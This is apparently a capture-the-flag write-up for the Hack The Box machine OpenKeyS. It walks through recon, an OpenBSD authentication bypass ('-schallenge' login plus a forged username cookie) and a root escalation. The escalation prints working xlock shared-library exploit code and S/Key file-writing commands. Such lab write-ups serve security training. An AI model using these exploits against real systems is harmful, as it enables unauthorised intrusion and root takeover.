---
title: HTB OpenKeyS
date: 2021-02-18
---

# HTB :  Openkeys

## Initial Recon

```
sudo nmap -sS -sV -sC 10.10.10.199 > rec_ini
```

![](Pictures/rec_ini.png)


1) The ssh port is open</br>
2) The http port 80 is open, which is running OpenBSD http</br>


Do the all ports scan just to make sure : 

```
sudo nmap -p- -T5 10.10.10.199 > all_ports
```

Same outcome. So we have to go for the web page.


## Testing the Login page

1) Gobuster shows a directory called `includes/`, which has two files, `auth.php` and `auth.php.swp`</br>
2) auth.php is empty and auth.php.swp is a swap file. It shows that there is an authenticate function, which takes the username and password for authentication</br>


```
gobuster dir -u http://10.10.10.199/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.199/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/07/30 21:30:08 Starting gobuster
===============================================================
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/vendor (Status: 301)
===============================================================
2020/07/30 21:34:10 Finished
===============================================================
```


![](Pictures/auth_files.png)

```
($cmd, $retcode);    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<?php
```

This part shows the use of an authenticate function.

There is a user called `jennifer`


If we do a strings on the swap file, we can have a proper look at it.

```
  $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
```

Here we can see that there might a directory called auth_helpers, one directory above the current one.

![](Pictures/auth_helpers.png)

`wget` the check_auth file present in this directory :

```
wget wget http://10.10.10.199/auth_helpers/check_auth
```

Upon running `file` command on this file, we see that it is a ELF64 binary for OpenBSD : 

```
$file check_auth 
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
```

And it is not stripped ;)


## OpenBSD Authentication Bypass


This article helps in the authentication bypass : 

https://www.secpod.com/blog/openbsd-authentication-bypass-and-local-privilege-escalation-vulnerabilities/

https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt

Use the OpenBSD manual for the login commands.</br>
As given in the blogs, we can authenticate to the OpenBSD Service using `-schallenge`

The password can be given as whatever.</br>


![](Pictures/challenge_key.png)


Here we can see that it is looking for the ssh-key of the user `-schallenge`


Password style authentication can be done using :

```
-schallenge:passwd
```


## Passing extra cookie

We can try to add another cookie called username, whose value will be `jennifer`.

![](Pictures/username_cookie.png)


When we forwar it using out Burpsuite, it will automatically authenticate as the user `jennifer`


![](Pictures/got_sshkey.png)

This will give us the sshkey for user jennifer.


## Using the ssh key to login as jennifer


We can use the ssh key to login to the box.


![](Pictures/shell.png)

```
ssh -i jen_id_rsa jennifer@10.10.10.199
Last login: Fri Jul 31 11:47:10 2020 from 10.10.14.50
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

openkeys$ pwd
/home/jennifer
openkeys$ whoami
jennifer
openkeys$ 
```

This will give us the user.txt


## Root


In the same article , there are few methods for local privilege escalation. One of them is using the xlock.</br>
If we check there, we see that its group user ID is set to auth and not its self user id as mentioned in the article.</ve>

If we can execute the operations quickly, then we can get the root shell.

1) First exploit the xlock : 


```
$ id
uid=32767(jennifer) gid=32767(jennifer) groups=32767(jennifer)

$ cd /tmp

$ cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>

static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);

    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF

$ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c

$ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &
[1] 2706

$ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66

$ id
uid=32767(jennifer) gid=11(auth) groups=32767(jennifer)
```

This will put the user `jennifer` in the group id `auth`, which will allow us to carry out the next exploits.</br>

2) Now we can escalate our privilege using the S/Key or Yubi/key : 


```
openkeys$ id
uid=1001(jennifer) gid=11(auth) groups=1001(jennifer), 0(wheel)
openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
openkeys$ chmod 0600 /etc/skey/root
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password:
openkeys# id                                                                                                                                                                            
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# ls -l
total 44
-rw-r--r--  1 root  wheel    87 Oct 12  2019 .Xdefaults
drwxr-xr-x  3 root  wheel   512 Jan 11  2020 .composer
-rw-r--r--  1 root  wheel   578 Oct 12  2019 .cshrc
-rw-r--r--  1 root  wheel    94 Oct 12  2019 .cvsrc
-rw-r--r--  1 root  wheel    10 Jan 11  2020 .forward
-rw-r--r--  1 root  wheel   328 Oct 12  2019 .login
-rw-r--r--  1 root  wheel   468 Oct 12  2019 .profile
drwx------  2 root  wheel   512 Jan 11  2020 .ssh
-rw-------  1 root  wheel  1362 Jun 23 12:35 .viminfo
-rw-r--r--  1 root  wheel   470 Jul 31 12:20 dead.letter
-r--------  1 root  wheel    33 Jan 12  2020 root.txt
```


This will directly give us the root shell.

![](Pictures/root.png)

